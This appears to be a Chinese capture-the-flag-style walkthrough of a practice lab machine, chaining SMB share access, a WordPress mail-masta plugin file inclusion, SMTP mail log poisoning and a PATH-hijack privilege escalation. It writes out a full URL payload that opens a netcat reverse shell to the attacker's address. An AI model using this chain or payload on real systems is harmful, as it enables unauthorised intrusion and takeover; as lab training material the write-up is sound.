日常靶机
扫出靶机IP
然后用nmap来获取主机信息
可以看到,主机开启了25端口的SMTP服务
于是直接连接上共享
smb://192.168.40.155
然后打开不需要密码的目录
这里基本上给了信息,用这几个密码尝试连接helios目录,发现qwerty可以
访问h3l105
,发现了一个wordpress
搭建的站点
点击链接会跳转到http://symfonos.local
,所以在本机的hosts里面加上这个IP和域名的映射
因为是WP搭的站,直接用wpscan扫一下
wpscan –url http://symfonos.local/h3l105
扫到了两个插件
然后去searchsploit
试试,扫出来两个洞,其中有个本地文件包含
然后根据给定的poc去尝试漏洞
那么联系到之前扫到的25端口的smtp服务,可以试图通过邮件污染的方法进行RCE
发送一个有问题的邮件,然后弹一个shell过来
[http://192.168.40.155/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc%20-e%20/bin/bash%20192.168.40.150%201551](http://192.168.40.155/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc -e /bin/bash 192.168.40.150 1551)
接下来是提权,先考虑suid的方法
发现了一个可疑的文件
strings一下这个文件,发现了一个更加可疑的curl命令
此时的思路是,statuscheck文件执行的时候,会从环境变量里面获得curl的目录,然后执行curl命令,那么我们如果伪造curl文件,并写入环境变量中,就可以提权
通过这个思路,我们成功提权
并且拿到flag